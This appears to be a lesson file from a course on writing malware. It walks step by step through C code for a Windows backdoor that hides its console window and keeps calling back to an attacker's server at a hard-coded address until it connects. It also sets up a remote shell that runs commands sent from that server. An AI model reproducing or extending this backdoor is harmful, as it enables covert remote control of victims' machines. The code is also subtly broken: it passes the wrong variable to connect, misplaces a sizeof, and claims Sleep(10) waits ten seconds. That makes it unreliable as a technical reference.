connection.md 3.6 KB
title: Stablishing connection course: code_malware section: "Building sockets"
layout: lesson
Before we can take a break by working in our main function and start working in our malware functionalities, we need to stablish the actual connection, let's do that.
To perform a connection, we can use the "connect" function. To use it, simply
invoke it and pass the socket as first argument, for the second argument, pass
the memory location of the server address "ServAddr", but we have to also
convert it to "struct sockaddr", to do so, simply open brackets before
"&ServAddr" and type "(struct sockaddr *)" and the third and last
parameter will be the actual size of the "ServAddr". That newly created line
would look like this:
connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr));
This is not the only thing we are going to code, we want our backdoor to try to connect to the target every 10 seconds. Why? Well, imagine you delivered the payload to the target, and they start it before you start the server, it will try to connect to your server, even before you it is started and waiting for incoming connections, so it will execute the code only to this part as it will return an error because the connection was not successful. How do we do it? Simple. We will execite the connect function every ten seconds until it is connected to the server. So create a while loop which condition will be the previously called function plus "!= 0" at the end, so... That portion of the code will be executed until the returned value of "connect" is not equal to zero, when it is equals to zero, it means the connection was stablished and our program will continue its execution. In the inside of our while loop, add "Sleep(10);" which will make our Backdoor not to do anything for the amount of seconds we entered, in this case, 10. Right below "Sleep(10);" we will add "goto start;". What is start? Well, actually, we haven't implemented it yet, so let's go to the before of our while loop and add "start:".
We have defined something called "start" right before the while loop, so let's imagine that line "start:" is some kind of a checkpoint, when called will execute our while loop which checks if a connection is stablished, if it is, then it will stop that portion of code, so the "start:" checkpoint won't be called again and continue with the program execution.
When the connection is stablished (below/after the connect while loop) we will call the "Shell" function and in the next lesson we will code our Shell function which will receive the commands we send from the server, will execute them and send the output back to server.
This is how our code looks so far:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
int sock;
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow) {
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindow", NULL);
ShowWindow(stealth, 0);
struct sockaddr_in ServAddr;
unsigned short ServPort;
char *ServIP;
WSADATA wsaData;
ServIP = "192.168.1.1";
ServPort = 50005;
if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
exit(1);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&ServAddr, 0, sizeof(ServAddr));
ServAddr.sin_family = AF_INET;
ServAddr.sin_addr.s_addr = inet_addr(ServIP);
ServAddr.sin_port = htons(ServPort);
start:
while (connect(socket, (struct sockaddr *) &ServAddr, sizeof(ServAddr != 0))) {
Sleep(10);
goto start;
}
}